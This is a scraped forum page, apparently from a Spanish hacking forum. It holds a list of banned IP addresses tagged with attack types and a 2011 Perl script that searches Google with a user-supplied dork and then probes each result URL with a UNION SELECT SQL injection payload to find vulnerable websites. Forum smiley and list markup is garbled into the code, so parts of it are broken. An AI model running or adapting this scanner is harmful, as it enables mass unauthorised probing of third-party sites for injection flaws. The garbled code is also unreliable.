[Perl] Search in google for scan SQLI

Security Anti-Hacker

This is the list of NukeSentinel(tm)
banned IP addresses.

• 124.180.243.6 - Injection
• 112.70.211.90 - Admin
• 52.26.150.61 - Flood
• 52.26.150.63 - Flood
• 52.26.150.200 - Flood
• 52.26.150.58 - Flood
• 94.177.249.67 - DDoS
• 161.34.180.20 - DDoS
• 161.34.180.18 - DDoS
• 161.34.180.34 - DDoS
• 161.34.180.39 - DDoS
• 161.34.180.77 - DDoS
• 173.192.165.172 - Injection
• 154.147.150.6 - Injection
• 173.192.216.93 - DDoS
• 8.22.205.203 - Flood
• 8.22.205.202 - Fuerza Bruta
• 94.242.209.169 - Admin
• 189.168.205.166 - Flood
• 201.152.152.131 - DDoS
• 123.123.123.123 - DDoS
• 190.127.237.139 - Scripting
• 189.23.124.111 - Scripting
• 195.117.61.210 - Fuerza Bruta
• 186.111.40.27 - DDoS
• 200.52.221.208 - DDoS
• 161.34.180.183 - DDoS
• 79 20 53 65 42 - Flood
• 201.230.124.10 - DDoS
• 98.14.12.150 - Fuerza Bruta
• 31.171.134.69 - DDoS
• 192.168.15.114 - Fuerza Bruta
• 72.2.180.81 - DDoS
• 52.26.191.226 - Flood
• 52.26.129.120 - Scripting
• 52.26.172.16 - Flood
• 52.26.172.16 - Fuerza Bruta
• 189.220.185.225 - Fuerza Bruta
• 72.9.233.140 - Fuerza Bruta
• 85.11.145.71 - Injection
• 71.145.11.85 - Injection
• 85.11.144.35 - Scripting
• 203.24.188.3 - Scripting
• 130.64.14.66 - DDoS
• 217.15.85.202 - Injection
• 61.91.54.42 - DDoS
• 5.135.166.108 - DDoS
• 58.9.99.67 - DDoS
• 47.89.185.47 - Admin
• 139.59.165.187 - DDoS
• 113.53.231.201 - Scripting
• 6.212.236.117 - DDoS
• 176.9.75.42 - Fuerza Bruta
• 64.56.28.89 - Flood
• 98.172.91.132 - Flood
• 52.50.18.125 - Admin
• 203.74.4.6 - Flood
• 180.183.80.79 - Fuerza Bruta
• 63.85.203.16 - DDoS
• 110.34.34.38 - Scripting
• 203.74.4.2 - Injection
• 98.50.219.239 - Injection
• 171.255.199.3 - DDoS
• 62.210.71.225 - DDoS
• 144.217.158.163 - Admin
• 158.69.31.45 - Scripting
• 89.187.217.112 - Flood
• 45.32.252.131 - Flood

[Perl] Search in google for scan SQLI

Un simple scanner de SQLI para usar en google

#!usr/bin/perl
#Search Google for scan SQLI
#(C) Doddy Hackman 2011
 
use LWP::UserAgent;
use HTML::LinkExtor;
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
head();
 
print "\n\n[Dork] : ";
chomp(my $dork = <stdin>);
print "\n\n[Pages] : ";
chomp(my $pages = <stdin>);
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n<ul class="bbc_list"><li type="square"> Finish\n";[/li][/list]
copyright();
<stdin>;
 
sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}
 
for(@url) {
if ($_ =~/cache:(.*?)<img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt="&#58;&#40;" title="Triste" class="smiley" />.*?)\+/) {
push(@founds,$2);
}
}
 
my @founds = repes(@founds);
 
return @founds; 
}
 
 
sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "</li><li type="square"> SQLI : $page\a\n";[/li][/list]
}}
 
sub get_links {
 
$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;
 
sub agarrar {
my ($a,%b) = @_;
push(@links,values %b); 
}
}
 
sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}
 
sub head {
print "\n\n-- == Search Google == --\n\n";
}
 
sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}
 
sub toma {
return $nave->get($_[0])->content;
}
 
sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}
 
#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?